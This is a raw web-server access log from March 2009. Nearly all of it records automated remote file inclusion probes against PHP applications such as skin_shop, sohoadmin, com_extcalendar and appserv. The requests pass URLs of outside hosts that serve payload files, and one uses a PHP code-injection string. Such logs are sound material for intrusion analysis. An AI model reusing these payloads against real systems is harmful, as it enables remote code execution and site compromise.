209.172.33.230 - - [22/Mar/2009:07:18:02 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:07:18:02 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:07:18:06 -0500] "GET /logs/access_log.1233792000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:07:20:58 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:07:20:58 -0500] "GET /logs/access_log.1232755200/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:07:20:58 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:07:21:09 -0500] "GET /logs/access_log.1231286400/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:07:24:22 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.geocities.com/tongdibanned/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
173.10.217.18 - - [22/Mar/2009:07:24:22 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.geocities.com/tongdibanned/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
203.130.236.211 - - [22/Mar/2009:07:25:55 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
203.130.236.211 - - [22/Mar/2009:07:25:58 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
94.23.17.145 - - [22/Mar/2009:07:30:35 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.yes-tech.co.kr//technote7/data/theme/id2.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
94.23.17.145 - - [22/Mar/2009:07:30:35 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.yes-tech.co.kr//technote7/data/theme/id2.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
64.118.84.7 - - [22/Mar/2009:07:31:40 -0500] "GET /logs//include/write.php?dir=http://crm.design-joomla.pl/classes/safe1.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
64.118.84.7 - - [22/Mar/2009:07:31:41 -0500] "GET //include/write.php?dir=http://crm.design-joomla.pl/classes/safe1.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
209.172.33.230 - - [22/Mar/2009:07:33:49 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:07:36:48 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.812"
209.172.33.230 - - [22/Mar/2009:07:36:48 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
203.251.81.216 - - [22/Mar/2009:07:37:32 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
203.251.81.216 - - [22/Mar/2009:07:37:32 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
203.251.81.216 - - [22/Mar/2009:07:37:32 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
203.251.81.216 - - [22/Mar/2009:07:37:37 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
208.64.202.134 - - [22/Mar/2009:07:38:10 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://members.mywave.at/m206111aa/cms/administrator/components/com_mkpostman/includes/v4id.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.60"
208.64.202.134 - - [22/Mar/2009:07:38:10 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://members.mywave.at/m206111aa/cms/administrator/components/com_mkpostman/includes/v4id.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.60"
87.101.4.49 - - [22/Mar/2009:07:41:30 -0500] "GET //?DOCUMENT_ROOT=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://weko.co.kr/data/file/notice/test.txt???? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
87.101.4.49 - - [22/Mar/2009:07:41:31 -0500] "GET /logs//?DOCUMENT_ROOT=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://weko.co.kr/data/file/notice/test.txt???? HTTP/1.1" 200 182577 "-""libwww-perl/5.79"
87.230.21.133 - - [22/Mar/2009:07:57:25 -0500] "GET /logs/images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
87.230.21.133 - - [22/Mar/2009:07:57:25 -0500] "GET /images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
81.12.13.152 - - [22/Mar/2009:07:58:50 -0500] "GET /logs/access_log.1231027200/appserv/main.php?appserv_root=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
81.12.13.152 - - [22/Mar/2009:07:58:50 -0500] "GET /appserv/main.php?appserv_root=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.12.13.152 - - [22/Mar/2009:07:58:50 -0500] "GET /logs/appserv/main.php?appserv_root=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
81.12.13.152 - - [22/Mar/2009:07:59:00 -0500] "GET /logs/access_log.1232928000/appserv/main.php?appserv_root=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
78.111.71.6 - - [22/Mar/2009:07:59:26 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:07:59:26 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:07:59:26 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:07:59:26 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
64.34.177.190 - - [22/Mar/2009:07:59:37 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
64.34.177.190 - - [22/Mar/2009:07:59:37 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
62.193.225.191 - - [22/Mar/2009:07:59:48 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:07:59:48 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:07:59:49 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:07:59:49 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
209.172.33.230 - - [22/Mar/2009:08:00:06 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:08:00:06 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:08:00:06 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:08:00:10 -0500] "GET /logs/access_log.1230422400//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
58.226.23.55 - - [22/Mar/2009:08:02:48 -0500] "GET /logs/access_log.1235952000/?INCLUDE_FOLDER=http://gumansin.com/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
58.226.23.55 - - [22/Mar/2009:08:02:48 -0500] "GET /?INCLUDE_FOLDER=http://gumansin.com/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
58.226.23.55 - - [22/Mar/2009:08:03:33 -0500] "GET /logs/access_log.1235692800/?INCLUDE_FOLDER=http://gumansin.com/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.52.10.106 - - [22/Mar/2009:08:04:49 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.articlecatalog.info/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
74.52.10.106 - - [22/Mar/2009:08:04:49 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.articlecatalog.info/id.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.810"
208.80.195.44 - - [22/Mar/2009:08:05:45 -0500] "GET / HTTP/1.0" 200 3233 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; ###157374710570625524779824###; .NET CLR 1.1.4322)"
72.232.182.162 - - [22/Mar/2009:08:08:41 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
72.232.182.162 - - [22/Mar/2009:08:08:41 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
72.232.182.162 - - [22/Mar/2009:08:08:41 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
87.101.4.49 - - [22/Mar/2009:08:09:10 -0500] "GET /logs//?DOCUMENT_ROOT=http://weko.co.kr/data/file/notice/test.txt??? HTTP/1.1" 200 182577 "-""libwww-perl/5.79"
87.101.4.49 - - [22/Mar/2009:08:09:10 -0500] "GET //?DOCUMENT_ROOT=http://weko.co.kr/data/file/notice/test.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
72.232.182.162 - - [22/Mar/2009:08:09:57 -0500] "GET /logs/access_log.1235692800//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
203.130.236.211 - - [22/Mar/2009:08:10:44 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
203.130.236.211 - - [22/Mar/2009:08:10:44 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
62.193.225.191 - - [22/Mar/2009:08:11:26 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:08:11:26 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
203.251.81.216 - - [22/Mar/2009:08:13:03 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
203.251.81.216 - - [22/Mar/2009:08:13:03 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
203.251.81.216 - - [22/Mar/2009:08:13:04 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
203.251.81.216 - - [22/Mar/2009:08:13:04 -0500] "GET /logs/access_log.1230422400//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
87.101.4.49 - - [22/Mar/2009:08:18:53 -0500] "GET //?DOCUMENT_ROOT=http://weko.co.kr/data/file/notice/test.txt???? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
87.101.4.49 - - [22/Mar/2009:08:18:54 -0500] "GET /logs//?DOCUMENT_ROOT=http://weko.co.kr/data/file/notice/test.txt???? HTTP/1.1" 200 182577 "-""libwww-perl/5.79"
64.34.177.190 - - [22/Mar/2009:08:20:21 -0500] "GET /logs//admin/index.php?_shop_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
64.34.177.190 - - [22/Mar/2009:08:20:21 -0500] "GET //admin/index.php?_shop_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.193.225.191 - - [22/Mar/2009:08:20:42 -0500] "GET /logs//admin/index.php?_shop_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:08:20:42 -0500] "GET //admin/index.php?_shop_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:08:20:42 -0500] "GET /logs//admin/index.php?_shop_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:08:20:42 -0500] "GET //admin/index.php?_shop_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
78.111.71.6 - - [22/Mar/2009:08:21:21 -0500] "GET /logs//admin/index.php?_shop_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:08:21:21 -0500] "GET /logs//admin/index.php?_shop_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:08:21:21 -0500] "GET //admin/index.php?_shop_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:08:21:21 -0500] "GET //admin/index.php?_shop_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.230.21.133 - - [22/Mar/2009:08:21:24 -0500] "GET /logs/images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
87.230.21.133 - - [22/Mar/2009:08:21:25 -0500] "GET /images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
64.34.177.190 - - [22/Mar/2009:08:21:41 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
64.34.177.190 - - [22/Mar/2009:08:21:41 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
62.193.225.191 - - [22/Mar/2009:08:22:15 -0500] "GET /logs//admin/index.php?_shop_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:08:22:15 -0500] "GET //admin/index.php?_shop_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
78.111.71.6 - - [22/Mar/2009:08:22:38 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:08:22:38 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:08:22:38 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:08:22:38 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
62.193.225.191 - - [22/Mar/2009:08:22:44 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:08:22:44 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:08:22:44 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:08:22:45 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
94.23.17.145 - - [22/Mar/2009:08:23:30 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yes-tech.co.kr//technote7/data/theme/id2.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
94.23.17.145 - - [22/Mar/2009:08:23:30 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yes-tech.co.kr//technote7/data/theme/id2.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
62.193.225.191 - - [22/Mar/2009:08:24:25 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:08:24:25 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
87.230.21.133 - - [22/Mar/2009:08:25:22 -0500] "GET /logs/images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
87.230.21.133 - - [22/Mar/2009:08:25:24 -0500] "GET /images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
64.34.177.190 - - [22/Mar/2009:08:28:19 -0500] "GET /logs//admin/index.php?_shop_path=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
64.34.177.190 - - [22/Mar/2009:08:28:19 -0500] "GET //admin/index.php?_shop_path=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
64.34.177.190 - - [22/Mar/2009:08:32:08 -0500] "GET /logs/access_log.1228608000//admin/index.php?_shop_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
64.34.177.190 - - [22/Mar/2009:08:32:09 -0500] "GET //admin/index.php?_shop_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
64.34.177.190 - - [22/Mar/2009:08:32:09 -0500] "GET /logs//admin/index.php?_shop_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
62.193.225.191 - - [22/Mar/2009:08:34:44 -0500] "GET /logs/access_log.1228608000//admin/index.php?_shop_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:08:34:44 -0500] "GET //admin/index.php?_shop_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:08:34:45 -0500] "GET /logs//admin/index.php?_shop_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
213.229.60.50 - - [22/Mar/2009:08:35:21 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://r0xx0l1n0.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.63"
213.229.60.50 - - [22/Mar/2009:08:35:22 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://r0xx0l1n0.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.63"
213.229.60.50 - - [22/Mar/2009:08:35:24 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://r0xx0l1n0.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.63"
213.229.60.50 - - [22/Mar/2009:08:35:24 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://r0xx0l1n0.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.63"
24.39.162.98 - - [22/Mar/2009:08:37:31 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://r0xx0l1n0.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
24.39.162.98 - - [22/Mar/2009:08:37:31 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://r0xx0l1n0.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
219.85.63.226 - - [22/Mar/2009:08:50:03 -0500] "GET //include/admin.lib.inc.php?site_path=http://guzelsanatlar.trakya.edu.tr/media/tz.txt?? HTTP/1.1" 404 309 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
62.193.225.191 - - [22/Mar/2009:08:56:01 -0500] "GET /logs///vwar/backup/errors.php?error=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:08:56:01 -0500] "GET /logs///vwar/backup/errors.php?error=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:08:56:01 -0500] "GET ///vwar/backup/errors.php?error=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:08:56:01 -0500] "GET ///vwar/backup/errors.php?error=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
208.76.222.178 - - [22/Mar/2009:08:56:16 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
